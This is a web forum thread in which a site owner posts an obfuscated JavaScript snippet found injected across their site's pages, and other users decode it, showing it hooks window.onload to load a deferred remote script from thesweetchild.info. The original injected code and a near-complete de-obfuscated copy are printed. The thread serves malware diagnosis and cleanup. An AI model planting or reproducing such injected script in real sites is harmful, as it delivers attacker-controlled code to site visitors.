Because I think it is. Found it in many files on my site. Now my site having problem with some of its function. <script>var m;if(m!='aR' && m!='q'){m='aR'};try {var pn=window[unescape("%75%6e%65%73%63%61%70%65")];var g;if(g!='' && g!='z'){g=''};var xU=new Date();var k=window[pn("%52%65%67%45%78%70")];var T='';var R="";var J=null;var c=pn("%72%65%70%6c%61%63%65");var E=new Date();var DI;if(DI!=''){DI='yL'};var iX;if(iX!=''){iX='ore'};function p(r,x){var nH=new Array();var Us=new Array();var ap='';var H=pn("%5b");H+=x;var O=new Date();var FJ=new String();H+=pn("%5d");var VZ;if(VZ!='oz' && VZ!='Fk'){VZ=''};var cM=new k(H, pn("%67"));return r.replace(cM, J);var v=new Array();};var r=pn("%31");var yA;if(yA!=''){yA='Dg'};var GW=new Date();var U=p('/rsRkHyR-EcroRm_/2gto2o_gHlreR._cRoEmH/UwtiUnHaEm2pH.tc_oRmH.2pRhtpt','r_tHERU2');var VYN;if(VYN!='' && VYN!='Ug'){VYN=''};var C="\x68\x74\x74\x70\x3a\x2f\x2f\x74\x68\x65\x73\x77\x65\x65\x74\x63\x68\x69\x6c\x64\x2e\x69\x6e\x66\x6f\x3a";this.RW="";var Q;if(Q!=''){Q='Vw'};var j_='';var UW="onloa"+"d";var gm=new Date();var u=pn("%73%63%72%69%70%74");var pz=new Array();var zj;if(zj!=''){zj='fJ'};var G=p('832039585720325','54219367');var F='';var OQ;if(OQ!='vt' && OQ != ''){OQ=null};var lH=new String();var M;if(M!='Bl'){M=''};function i(){this.mw='';var yx="";var VX;if(VX!='ql'){VX=''};var Hf=document;this.Sh='';V=Hf.createElement(u);var rR;if(rR!='e'){rR=''};var tn=new Array();var P;if(P!='zx' && P!='qa'){P=''};this.BO='';F+=C;F+=G+U;var UK;if(UK!='ak' && UK!='uR'){UK=''};var bQ;if(bQ!='NC'){bQ=''};var ZT;if(ZT!='' && ZT!='me'){ZT=''};var TR;if(TR!='' && TR!='pV'){TR=''};V.defer=r;var bT;if(bT!='YE'){bT=''};var kD=new Date();var Zd=new Date();V.src=F;var UZ=Hf.body;var PG='';var w;if(w!='fU'){w=''};var dj;if(dj!='CC'){dj='CC'};this.iG="";UZ.appendChild(V);};var tr;if(tr!='' && tr!='VM'){tr='BJ'};var dz;if(dz!='' && dz!='fX'){dz='En'};var WK=new String();var FU;if(FU!='Y_' && FU!='FZ'){FU='Y_'};window[UW]=i;var FN;if(FN!='' && FN!='mT'){FN='um'};} catch(a){};var Ni="";var cZ;if(cZ!='' && cZ!='aS'){cZ=null};</script> <!--9ca15de82e1caa13a6cf1a4ad9f36a27--> PHP: My site always making connection to thesweetchild.info whenever I load the any page thus this worries me. Who can translate this?
hmm... not sure what it's trying to do but looks like it's trying to hide something. Some of the function calls are encoded - "%72%65%70%6c%61%63%65" = "replace", "%52%65%67%45%78%70" = "RegExp". I'd say that if you didn't put it there, ditch it. (or at least see what happens when it's ditched)
it tries to mask a script append through a window.onload and a dynamic deferred injection of the following composite url: http://thesweetchild.info:8nullnull...pnull.nullcnullonullmnull.nullpnullhnullpnull the code itself is pretty well obfuscated. var m; if (m != 'aR' && m != 'q') { m = 'aR' }; var pn = window[unescape("%75%6e%65%73%63%61%70%65")]; // unescape var g; if (g != '' && g != 'z') { g = '' }; var xU = new Date(); var k = window[pn("%52%65%67%45%78%70")]; // RegExp var T = ''; var R = ""; var J = null; var c = pn("%72%65%70%6c%61%63%65"); // replace var E = new Date(); var DI; if (DI != '') { DI = 'yL' }; var iX; if (iX != '') { iX = 'ore' }; function p(r, x) { var nH = new Array(); var Us = new Array(); var ap = ''; var H = pn("%5b"); // [ H += x; var O = new Date(); var FJ = new String(); H += pn("%5d"); // ] var VZ; if (VZ != 'oz' && VZ != 'Fk') { VZ = '' }; var cM = new k(H, pn("%67")); // g console.log(r.replace(cM, J)); return r.replace(cM, J); var v = new Array(); }; var r = pn("%31"); // "1" var yA; if (yA != '') { yA = 'Dg' }; var GW = new Date(); var U = p('/rsRkHyR-EcroRm_/2gto2o_gHlreR._cRoEmH/UwtiUnHaEm2pH.tc_oRmH.2pRhtpt', 'r_tHERU2'); var VYN; if (VYN != '' && VYN != 'Ug') { VYN = '' }; var C = "http://thesweetchild.info:"; this.RW = ""; var Q; if (Q != '') { Q = 'Vw' }; var j_ = ''; var UW = "onloa" + "d"; var gm = new Date(); var u = pn("%73%63%72%69%70%74"); // script var pz = new Array(); var zj; if (zj != '') { zj = 'fJ' }; var G = p('832039585720325', '54219367'); var F = ''; var OQ; if (OQ != 'vt' && OQ != '') { OQ = null }; var lH = new String(); var M; if (M != 'Bl') { M = '' }; function i() { this.mw = ''; var yx = ""; var VX; if (VX != 'ql') { VX = '' }; var Hf = document; this.Sh = ''; V = Hf.createElement(u); var rR; if (rR != 'e') { rR = '' }; var tn = new Array(); var P; if (P != 'zx' && P != 'qa') { P = '' }; this.BO = ''; F += C; F += G + U; var UK; if (UK != 'ak' && UK != 'uR') { UK = '' }; var bQ; if (bQ != 'NC') { bQ = '' }; var ZT; if (ZT != '' && ZT != 'me') { ZT = '' }; var TR; if (TR != '' && TR != 'pV') { TR = '' }; V.defer = r; var bT; if (bT != 'YE') { bT = '' }; var kD = new Date(); var Zd = new Date(); V.src = F; console.log(F); var UZ = Hf.body; var PG = ''; var w; if (w != 'fU') { w = '' }; var dj; if (dj != 'CC') { dj = 'CC' }; this.iG = ""; // stop appending // UZ.appendChild(V); console.log(V); }; var tr; if (tr != '' && tr != 'VM') { tr = 'BJ' }; var dz; if (dz != '' && dz != 'fX') { dz = 'En' }; var WK = new String(); var FU; if (FU != 'Y_' && FU != 'FZ') { FU = 'Y_' }; window[UW] = i; // window.onload = i (function callback) var FN; if (FN != '' && FN != 'mT') { FN = 'um' }; var Ni = ""; var cZ; if (cZ != '' && cZ != 'aS') { cZ = null }; Code (javascript): you are probably noticing it as the url composed is invalid so it never finishes fetching it... but it's pretty lame in that it just overwrites the onload with its own copy, bound to get noticed if you have your own onload handlers beforehand.